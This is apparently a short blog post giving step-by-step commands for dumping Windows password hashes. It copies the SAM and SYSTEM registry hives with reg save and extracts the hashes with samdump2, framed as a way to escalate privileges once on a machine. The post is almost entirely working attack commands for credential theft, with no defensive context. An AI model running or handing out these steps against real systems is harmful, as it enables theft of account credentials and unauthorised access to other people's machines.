To get Windows Passwords use PowerShell - of course, you must have access to the box to get these. This is just a way of possibly escalating privileges or getting further access
reg save hklm\\sam [destination to save]reg save hklm\\system [destination to save]Next we need to get the hashes out of the files. We’ll do this with samdump2
sudo apt-get install samdump2then grab the hashes with
samdump2 SYSTEM SAM > hashes.txtmake sure that you’re in the folder housing SYSTEM and SAM files.
Comments